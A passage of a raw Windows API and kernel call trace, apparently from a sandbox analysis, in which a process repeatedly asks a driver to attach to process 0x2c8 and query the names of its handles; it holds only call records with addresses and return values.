nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xf4, lpOverlapped=0x0) returned 1 [0244.583] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.583] PsAcquireProcessExitSynchronization () returned 0x0 [0244.583] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.583] ObReferenceObjectByHandle (in: Handle=0x5b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800369ee60, HandleInformation=0x0) returned 0x0 [0244.583] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.584] PsReleaseProcessExitSynchronization () returned 0x2 [0244.584] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.584] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.584] ObfDereferenceObject (Object=0xfffffa800369ee60) returned 0x12 [0244.584] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.584] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.584] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.584] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x110, lpOverlapped=0x0) returned 1 [0244.584] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.584] PsAcquireProcessExitSynchronization () returned 0x0 [0244.584] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.584] ObReferenceObjectByHandle (in: Handle=0x5b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80039b4140, HandleInformation=0x0) returned 0x0 [0244.584] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.584] PsReleaseProcessExitSynchronization () returned 0x2 [0244.584] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.584] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.584] ObfDereferenceObject (Object=0xfffffa80039b4140) returned 0x12 [0244.584] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.584] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.584] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.584] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xf4, lpOverlapped=0x0) returned 1 [0244.584] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.584] PsAcquireProcessExitSynchronization () returned 0x0 [0244.584] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.584] ObReferenceObjectByHandle (in: Handle=0x5bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034ef820, HandleInformation=0x0) returned 0x0 [0244.584] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.584] PsReleaseProcessExitSynchronization () returned 0x2 [0244.584] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.584] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.584] ObfDereferenceObject (Object=0xfffffa80034ef820) returned 0x12 [0244.584] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.584] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.585] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.585] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xfe, lpOverlapped=0x0) returned 1 [0244.585] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.585] PsAcquireProcessExitSynchronization () returned 0x0 [0244.585] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.585] ObReferenceObjectByHandle (in: Handle=0x5c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034d75f0, HandleInformation=0x0) returned 0x0 [0244.585] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.585] PsReleaseProcessExitSynchronization () returned 0x2 [0244.585] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.585] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.585] ObfDereferenceObject (Object=0xfffffa80034d75f0) returned 0x12 [0244.585] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.585] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.585] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.585] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x11a, lpOverlapped=0x0) returned 1 [0244.585] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.585] PsAcquireProcessExitSynchronization () returned 0x0 [0244.585] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.585] ObReferenceObjectByHandle (in: Handle=0x5c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034e03d0, HandleInformation=0x0) returned 0x0 [0244.585] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.585] PsReleaseProcessExitSynchronization () returned 0x2 [0244.585] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.585] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800310e044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800310e044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.585] ObfDereferenceObject (Object=0xfffffa80034e03d0) returned 0x12 [0244.585] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.585] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.585] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.585] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xf4, lpOverlapped=0x0) returned 1 [0244.585] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.585] PsAcquireProcessExitSynchronization () returned 0x0 [0244.586] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.586] ObReferenceObjectByHandle (in: Handle=0x5cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034d7900, HandleInformation=0x0) returned 0x0 [0244.586] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.586] PsReleaseProcessExitSynchronization () returned 0x2 [0244.586] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.586] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.586] ObfDereferenceObject (Object=0xfffffa80034d7900) returned 0x13 [0244.586] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.586] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.586] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.586] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xd6, lpOverlapped=0x0) returned 1 [0244.586] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.586] PsAcquireProcessExitSynchronization () returned 0x0 [0244.586] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.586] ObReferenceObjectByHandle (in: Handle=0x5d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003748070, HandleInformation=0x0) returned 0x0 [0244.586] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.586] PsReleaseProcessExitSynchronization () returned 0x2 [0244.586] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.586] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.586] ObfDereferenceObject (Object=0xfffffa8003748070) returned 0x20 [0244.586] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.586] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.586] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.586] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xd8, lpOverlapped=0x0) returned 1 [0244.586] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.586] PsAcquireProcessExitSynchronization () returned 0x0 [0244.586] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.586] ObReferenceObjectByHandle (in: Handle=0x5e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034e38b0, HandleInformation=0x0) returned 0x0 [0244.586] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.587] PsReleaseProcessExitSynchronization () returned 0x2 [0244.587] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.587] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.587] ObfDereferenceObject (Object=0xfffffa80034e38b0) returned 0x20 [0244.587] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.587] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.587] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.587] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x118, lpOverlapped=0x0) returned 1 [0244.587] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.587] PsAcquireProcessExitSynchronization () returned 0x0 [0244.587] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.587] ObReferenceObjectByHandle (in: Handle=0x5e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034eaf20, HandleInformation=0x0) returned 0x0 [0244.587] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.587] PsReleaseProcessExitSynchronization () returned 0x2 [0244.587] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.587] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.587] ObfDereferenceObject (Object=0xfffffa80034eaf20) returned 0x12 [0244.587] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.587] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.587] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.587] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xea, lpOverlapped=0x0) returned 1 [0244.587] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.587] PsAcquireProcessExitSynchronization () returned 0x0 [0244.587] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.587] ObReferenceObjectByHandle (in: Handle=0x600, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003ac8970, HandleInformation=0x0) returned 0x0 [0244.587] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.587] PsReleaseProcessExitSynchronization () returned 0x2 [0244.587] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.587] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.587] ObfDereferenceObject (Object=0xfffffa8003ac8970) returned 0x12 [0244.588] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.588] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.588] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.588] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3c, lpOverlapped=0x0) returned 1 [0244.588] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.588] PsAcquireProcessExitSynchronization () returned 0x0 [0244.588] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.588] ObReferenceObjectByHandle (in: Handle=0x624, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002ee2610, HandleInformation=0x0) returned 0x0 [0244.588] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.588] PsReleaseProcessExitSynchronization () returned 0x2 [0244.588] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.588] ObQueryNameString (in: Object=0xfffffa8002ee2610, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.588] ObfDereferenceObject (Object=0xfffffa8002ee2610) returned 0x2 [0244.588] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.588] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.588] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.588] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xcc, lpOverlapped=0x0) returned 1 [0244.588] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.588] PsAcquireProcessExitSynchronization () returned 0x0 [0244.588] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.588] ObReferenceObjectByHandle (in: Handle=0x628, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002571b80, HandleInformation=0x0) returned 0x0 [0244.588] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.588] PsReleaseProcessExitSynchronization () returned 0x2 [0244.588] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.588] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.588] ObfDereferenceObject (Object=0xfffffa8002571b80) returned 0x11 [0244.588] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.588] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.588] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.588] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0244.588] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.588] PsAcquireProcessExitSynchronization () returned 0x0 [0244.589] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.589] ObReferenceObjectByHandle (in: Handle=0x63c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001170d80, HandleInformation=0x0) returned 0x0 [0244.589] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.589] PsReleaseProcessExitSynchronization () returned 0x2 [0244.589] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.589] ObQueryNameString (in: Object=0xfffff8a001170d80, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.589] ObfDereferenceObject (Object=0xfffff8a001170d80) returned 0x9 [0244.589] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.589] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.589] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.589] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0244.589] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.589] PsAcquireProcessExitSynchronization () returned 0x0 [0244.589] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.589] ObReferenceObjectByHandle (in: Handle=0x640, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002533590, HandleInformation=0x0) returned 0x0 [0244.589] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.589] PsReleaseProcessExitSynchronization () returned 0x2 [0244.589] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.589] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.589] ObfDereferenceObject (Object=0xfffffa8002533590) returned 0x11 [0244.589] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.589] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.589] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.589] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xd8, lpOverlapped=0x0) returned 1 [0244.589] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.589] PsAcquireProcessExitSynchronization () returned 0x0 [0244.589] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880053c85d0) [0244.589] ObReferenceObjectByHandle (in: Handle=0x64c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002837920, HandleInformation=0x0) returned 0x0 [0244.589] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.589] PsReleaseProcessExitSynchronization () returned 0x2 [0244.589] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xcb [0244.590] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.590] ObfDereferenceObject (Object=0xfffffa8002837920) returned 0x13 [0244.590] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.590] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.590] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.590] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xea, lpOverlapped=0x0) returned 1 [0244.590] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.590] PsAcquireProcessExitSynchronization () returned 0x0 [0244.590] KeStackAttachProcess (in: 